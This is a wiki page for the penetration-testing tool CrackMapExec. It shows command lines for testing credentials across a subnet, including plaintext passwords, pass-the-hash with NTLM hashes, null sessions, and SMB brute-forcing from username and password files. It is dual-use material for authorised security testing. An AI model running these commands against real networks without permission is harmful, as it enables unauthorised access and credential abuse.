Skip to content
This repository has been archived by the owner on Dec 6, 2023. It is now read-only.

Using Credentials

byt3bl33d3r edited this page Jun 5, 2016 · 27 revisions

Using Credentials

The most basic way to test a set of of credentials across a network:

With a plaintext password:

crackmapexec 172.16.0.1/24 -u username -p password

Note: When using usernames or passwords that contain special symbols, wrap them in single quotes to make your shell interpret it as a string:

crackmapexec 172.16.0.1/24 -u username -p 'Admin!123@'

#Passing-the-Hash CME supports authenticating using Passing-The-Hash attacks with the -H flag:

crackmapexec 172.16.0.1/24 -u username -H LMHASH:NTHASH
crackmapexec 172.16.0.1/24 -u username -H NTHASH

Null Sessions

You can log in with a null session by using '' as the username and/or password

Examples:

crackmapexec 172.16.0.1/24 -u '' -p ''

Brute-Forcing SMB

By specifying a file or multiple values with the -u, -p and -H arguments, CME will automatically brute-force SMB logins for all targets:

Examples:

crackmapexec 172.16.0.1/24 -u username1 -p password1 password2
crackmapexec 172.16.0.1/24 -u username1 username2 -p password1
crackmapexec 172.16.0.1/24 -u username1 username2 -H LMHASH:NTHASH LMHASH:NTHASH
crackmapexec 172.16.0.1/24 -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec 172.16.0.1/24 -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes